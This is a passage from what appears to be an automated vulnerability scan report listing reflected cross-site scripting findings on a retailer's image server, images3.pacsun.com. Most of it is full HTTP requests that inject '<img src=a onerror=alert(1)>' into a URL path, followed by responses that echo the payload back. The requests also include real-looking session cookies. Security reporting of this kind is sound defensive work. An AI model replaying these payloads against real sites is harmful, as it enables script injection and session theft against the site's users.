Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:21 GMT
Connection: close

Unable to find /pacsun/detailLogo_2423981c<img src=a onerror=alert(1)>f3c6a27bcdf

3.55. http://images3.pacsun.com/is/image/pacsun/detailLogo_261 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_261

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2bd47<img%20src%3da%20onerror%3dalert(1)>32ef2fcb48c was submitted in the REST URL parameter 4. This input was echoed as 2bd47<img src=a onerror=alert(1)>32ef2fcb48c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_2612bd47<img%20src%3da%20onerror%3dalert(1)>32ef2fcb48c?$img_gif$&hei=20&wid=82&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:27 GMT
Connection: close

Unable to find /pacsun/detailLogo_2612bd47<img src=a onerror=alert(1)>32ef2fcb48c

3.56. http://images3.pacsun.com/is/image/pacsun/detailLogo_291 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_291

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1bec2<img%20src%3da%20onerror%3dalert(1)>800c3098bb6 was submitted in the REST URL parameter 4. This input was echoed as 1bec2<img src=a onerror=alert(1)>800c3098bb6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_2911bec2<img%20src%3da%20onerror%3dalert(1)>800c3098bb6?$img_gif$&hei=20&wid=48&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:43 GMT
Connection: close

Unable to find /pacsun/detailLogo_2911bec2<img src=a onerror=alert(1)>800c3098bb6

3.57. http://images3.pacsun.com/is/image/pacsun/detailLogo_301 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_301

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bbe2e<img%20src%3da%20onerror%3dalert(1)>4a5863699ef was submitted in the REST URL parameter 4. This input was echoed as bbe2e<img src=a onerror=alert(1)>4a5863699ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_301bbe2e<img%20src%3da%20onerror%3dalert(1)>4a5863699ef?$img_gif$&hei=20&wid=61&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:29 GMT
Connection: close

Unable to find /pacsun/detailLogo_301bbe2e<img src=a onerror=alert(1)>4a5863699ef

3.58. http://images3.pacsun.com/is/image/pacsun/detailLogo_311 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_311

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4d241<img%20src%3da%20onerror%3dalert(1)>f3192c4dd8e was submitted in the REST URL parameter 4. This input was echoed as 4d241<img src=a onerror=alert(1)>f3192c4dd8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_3114d241<img%20src%3da%20onerror%3dalert(1)>f3192c4dd8e?$img_gif$&hei=20&wid=45&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:25 GMT
Connection: close

Unable to find /pacsun/detailLogo_3114d241<img src=a onerror=alert(1)>f3192c4dd8e

3.59. http://images3.pacsun.com/is/image/pacsun/detailLogo_321 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_321

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7708a<img%20src%3da%20onerror%3dalert(1)>cea37b0dc27 was submitted in the REST URL parameter 4. This input was echoed as 7708a<img src=a onerror=alert(1)>cea37b0dc27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_3217708a<img%20src%3da%20onerror%3dalert(1)>cea37b0dc27?$img_gif$&hei=20&wid=82&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:23 GMT
Connection: close

Unable to find /pacsun/detailLogo_3217708a<img src=a onerror=alert(1)>cea37b0dc27

3.60. http://images3.pacsun.com/is/image/pacsun/detailLogo_331 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_331

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c626d<img%20src%3da%20onerror%3dalert(1)>f8e8550aea6 was submitted in the REST URL parameter 4. This input was echoed as c626d<img src=a onerror=alert(1)>f8e8550aea6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_331c626d<img%20src%3da%20onerror%3dalert(1)>f8e8550aea6?$img_gif$&hei=20&wid=29&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:41 GMT
Connection: close

Unable to find /pacsun/detailLogo_331c626d<img src=a onerror=alert(1)>f8e8550aea6

3.61. http://images3.pacsun.com/is/image/pacsun/detailLogo_341 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_341

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f3612<img%20src%3da%20onerror%3dalert(1)>8e7e91e7892 was submitted in the REST URL parameter 4. This input was echoed as f3612<img src=a onerror=alert(1)>8e7e91e7892 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_341f3612<img%20src%3da%20onerror%3dalert(1)>8e7e91e7892?$img_gif$&hei=20&wid=49&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:36 GMT
Connection: close

Unable to find /pacsun/detailLogo_341f3612<img src=a onerror=alert(1)>8e7e91e7892

3.62. http://images3.pacsun.com/is/image/pacsun/detailLogo_391 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_391

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cec91<img%20src%3da%20onerror%3dalert(1)>fe6601272ff was submitted in the REST URL parameter 4. This input was echoed as cec91<img src=a onerror=alert(1)>fe6601272ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_391cec91<img%20src%3da%20onerror%3dalert(1)>fe6601272ff?$img_gif$&hei=20&wid=33&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:31 GMT
Connection: close

Unable to find /pacsun/detailLogo_391cec91<img src=a onerror=alert(1)>fe6601272ff

3.63. http://images3.pacsun.com/is/image/pacsun/detailLogo_421 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_421

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 61b2e<img%20src%3da%20onerror%3dalert(1)>c719197871a was submitted in the REST URL parameter 4. This input was echoed as 61b2e<img src=a onerror=alert(1)>c719197871a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_42161b2e<img%20src%3da%20onerror%3dalert(1)>c719197871a?$img_gif$&hei=20&wid=102&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:33 GMT
Connection: close

Unable to find /pacsun/detailLogo_42161b2e<img src=a onerror=alert(1)>c719197871a

3.64. http://images3.pacsun.com/is/image/pacsun/detailLogo_432 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_432

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fdfd6<img%20src%3da%20onerror%3dalert(1)>5225426e988 was submitted in the REST URL parameter 4. This input was echoed as fdfd6<img src=a onerror=alert(1)>5225426e988 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_432fdfd6<img%20src%3da%20onerror%3dalert(1)>5225426e988?$img_gif$&hei=20&wid=39&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:38 GMT
Connection: close

Unable to find /pacsun/detailLogo_432fdfd6<img src=a onerror=alert(1)>5225426e988

3.65. http://images3.pacsun.com/is/image/pacsun/detailLogo_471 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_471

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c3b86<img%20src%3da%20onerror%3dalert(1)>2f11037b8a8 was submitted in the REST URL parameter 4. This input was echoed as c3b86<img src=a onerror=alert(1)>2f11037b8a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_471c3b86<img%20src%3da%20onerror%3dalert(1)>2f11037b8a8?$img_gif$&hei=20&wid=56&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:24 GMT
Connection: close

Unable to find /pacsun/detailLogo_471c3b86<img src=a onerror=alert(1)>2f11037b8a8

3.66. http://images3.pacsun.com/is/image/pacsun/detailLogo_482 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_482

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 92ad0<img%20src%3da%20onerror%3dalert(1)>67a04e9f9ad was submitted in the REST URL parameter 4. This input was echoed as 92ad0<img src=a onerror=alert(1)>67a04e9f9ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_48292ad0<img%20src%3da%20onerror%3dalert(1)>67a04e9f9ad?$img_gif$&hei=20&wid=14&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:37 GMT
Connection: close

Unable to find /pacsun/detailLogo_48292ad0<img src=a onerror=alert(1)>67a04e9f9ad

3.67. http://images3.pacsun.com/is/image/pacsun/detailLogo_501 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_501

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 25c5c<img%20src%3da%20onerror%3dalert(1)>acdf4b335e7 was submitted in the REST URL parameter 4. This input was echoed as 25c5c<img src=a onerror=alert(1)>acdf4b335e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_50125c5c<img%20src%3da%20onerror%3dalert(1)>acdf4b335e7?$img_gif$&hei=20&wid=93&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:36 GMT
Connection: close

Unable to find /pacsun/detailLogo_50125c5c<img src=a onerror=alert(1)>acdf4b335e7

3.68. http://images3.pacsun.com/is/image/pacsun/detailLogo_541 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_541

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1700a<img%20src%3da%20onerror%3dalert(1)>431cdd919b0 was submitted in the REST URL parameter 4. This input was echoed as 1700a<img src=a onerror=alert(1)>431cdd919b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_5411700a<img%20src%3da%20onerror%3dalert(1)>431cdd919b0?$img_gif$&hei=20&wid=24&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:27 GMT
Connection: close

Unable to find /pacsun/detailLogo_5411700a<img src=a onerror=alert(1)>431cdd919b0

3.69. http://images3.pacsun.com/is/image/pacsun/detailLogo_551 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_551

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ff769<img%20src%3da%20onerror%3dalert(1)>4cee47844e1 was submitted in the REST URL parameter 4. This input was echoed as ff769<img src=a onerror=alert(1)>4cee47844e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_551ff769<img%20src%3da%20onerror%3dalert(1)>4cee47844e1?$img_gif$&hei=20&wid=140&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
